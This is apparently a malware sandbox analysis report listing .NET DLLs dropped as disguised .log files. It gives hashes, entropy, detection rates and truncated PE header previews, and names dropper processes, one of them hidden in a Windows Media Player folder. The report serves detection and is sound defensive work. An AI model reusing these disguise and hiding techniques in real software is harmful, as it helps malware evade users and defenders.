                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34816
                                                                                        Entropy (8bit):5.636032516496583
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\gPpSweJV.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):24576
                                                                                        Entropy (8bit):5.535426842040921
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\jGLeSKCo.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):41472
                                                                                        Entropy (8bit):5.6808219961645605
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\jybLobci.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.629584586954759
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\kHClnwJL.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33280
                                                                                        Entropy (8bit):5.634433516692816
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\kOdTVPKT.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):126976
                                                                                        Entropy (8bit):6.057993947082715
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                        C:\Users\user\Desktop\kuPmEXym.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):23552
                                                                                        Entropy (8bit):5.529329139831718
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\lnWbuaeE.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.660491370279985
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\mHfKTHWS.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):89600
                                                                                        Entropy (8bit):5.905167202474779
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                        C:\Users\user\Desktop\mzvrpXvN.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38912
                                                                                        Entropy (8bit):5.679286635687991
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\npJJQJjz.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.629584586954759
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\pHCSiMBb.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):89600
                                                                                        Entropy (8bit):5.905167202474779
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                        C:\Users\user\Desktop\pKSShysD.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38400
                                                                                        Entropy (8bit):5.699005826018714
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\pyJigHPD.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):70144
                                                                                        Entropy (8bit):5.909536568846014
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\qwPLRqWX.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):70144
                                                                                        Entropy (8bit):5.909536568846014
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\rNFADhxz.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):50176
                                                                                        Entropy (8bit):5.723168999026349
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\rmNqRUKB.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):50176
                                                                                        Entropy (8bit):5.723168999026349
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\sRYTiegb.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32256
                                                                                        Entropy (8bit):5.631194486392901
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\sTDIJUfq.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):46592
                                                                                        Entropy (8bit):5.870612048031897
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\swyioMDw.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):69632
                                                                                        Entropy (8bit):5.932541123129161
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
